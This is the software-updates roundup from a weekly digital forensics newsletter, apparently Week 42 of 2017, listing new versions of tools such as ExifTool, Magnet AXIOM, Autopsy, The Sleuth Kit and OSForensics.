- Phil Harvey has updated ExifTool to version 10.64 (development release), adding new tags and fixing some bugs.
  ExifTool 10.64
- Sarah Edwards at Mac4n6 updated her Mac MRU Parser to version 1.3 to support the new .sfl2 MRU files.
  Script Update – Mac MRU Parser v1.3 – New 10.13 *.sfl2 MRU Files
- Magnet Forensics updated AXIOM to version 1.2.1, adding support for iOS 11 and Android Oreo, as well as other improvements.
  Magnet AXIOM 1.2.1 Supports iOS 11 and Brings Other Enhancements
- MSAB (Micro Systemation) has released XEC v2.0 and Kiosk and Tablet v7.5. XEC adds “Tailored personalization for each export type in the updated GUI [and a] new option to archive the output into one or more .zip files”. “Kiosk and Tablet v7.5 can now be networked”
  New XEC v2.0 now available: XEC Director, Export & Express and MSAB Kiosk v7.5
- PassMark updated OSForensics to version V5.2.1001 with some bug fixes and updates to the triage wizard.
  V5.2.1001 – 18th of October 2017
- Stroz Friedberg released plistutils, a library that provides a “number of convenience functions for dealing with Apple Property List files” with the goal of providing “a single, comprehensive Python library for dealing with all aspects of Plist parsing.”
  plistutils
- Version 4.5.0 of both The Sleuth Kit and Autopsy was released during the week with some new features and bug fixes. The correlations database in Autopsy is interesting – it stores artefacts in a separate database so that you can identify connections between different cases.
- X-Ways: “A new download of v8.5.3 of the viewer component is now available. It includes one security fix, apparently to protect the software against malformed TIFF files (just a guess, did not find an official description). The update is probably recommendable.”
  X-Ways Viewer Component
And that’s all for Week 42! If you think I’ve missed something, or want me to cover something specifically hit me up through the contact page or on the social pipes!